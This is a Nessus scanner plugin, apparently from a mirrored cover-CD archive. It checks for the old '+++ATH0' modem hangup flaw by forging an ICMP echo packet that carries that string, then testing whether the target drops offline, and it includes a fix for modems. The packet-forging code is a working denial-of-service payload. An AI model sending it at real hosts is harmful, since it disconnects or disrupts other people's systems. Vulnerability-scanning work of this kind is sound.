home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / ath0_hangup.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  90 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10020);
  10.  script_version ("$Revision: 1.14 $");
  11.  script_cve_id("CAN-1999-1228");
  12.  name["english"] = "+ + + ATH0 modem hangup";
  13.  name["francais"] = "DΘcrochage du modem par la sΘquence + + + ATH0";
  14.  
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. It was possible to disconnect the remote
  19. host by sending it an ICMP echo request packet 
  20. containing the string '+ + + ATH0' (without the spaces).
  21. It is also possible to make the remote modem
  22. hangup and dial any phone number.
  23.  
  24. Solution : add 'ATS2=255' in your modem
  25. init string.
  26.  
  27. Risk factor : High";
  28.  
  29.  
  30.  desc["francais"] = "
  31. Il s'est avΘrΘ possible de forcer la machine
  32. distante α se deconnecter en lui envoyant
  33. une requΩte ICMP echo contenant la chaine
  34. '+ + + ATH0' (sans les espaces). 
  35. Il est aussi possible de forcer le modem
  36. α raccrocher et α composer un numΘro
  37. de tΘlΘphone arbitraire.
  38.  
  39. Solution : ajoutez 'ATS2=255'
  40. dans la chaine d'init du modem.
  41.  
  42. Facteur de risque : ElevΘ";
  43.  
  44.  script_description(english:desc["english"], francais:desc["francais"]);
  45.  
  46.  summary["english"] = "Makes a modem hangup";
  47.  summary["francais"] = "Fait raccrocher un modem";
  48.  script_summary(english:summary["english"], francais:summary["francais"]);
  49.  
  50.  script_category(ACT_KILL_HOST);
  51.  
  52.  
  53.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  54.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  55.  family["english"] = "Denial of Service";
  56.  family["francais"] = "DΘni de service";
  57.  script_family(english:family["english"], francais:family["francais"]);
  58.  
  59.  
  60.  exit(0);
  61. }
  62.  
  63. #
  64. # The script code starts here
  65. #
  66.  
  67. ip = forge_ip_packet(ip_hl:5, ip_v:4,   ip_off:0,
  68.              ip_id:9, ip_tos:0, ip_p : IPPROTO_ICMP,
  69.              ip_len : 20, ip_src : this_host(),
  70.              ip_ttl : 255);
  71.  
  72.  
  73. data = string("+++ATH0\r\n");              
  74. icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0,
  75.                icmp_seq : 2, icmp_id : 2, 
  76.               data:data);
  77.  
  78. start_denial();
  79.               
  80. reply1 = send_packet(icmp, pcap_active:TRUE);
  81.  
  82. alive = end_denial();
  83.  
  84. if(!alive){
  85.      security_hole(0);
  86.     set_kb_item(name:"Host/dead", value:TRUE);
  87.     }
  88.  
  89.                      
  90.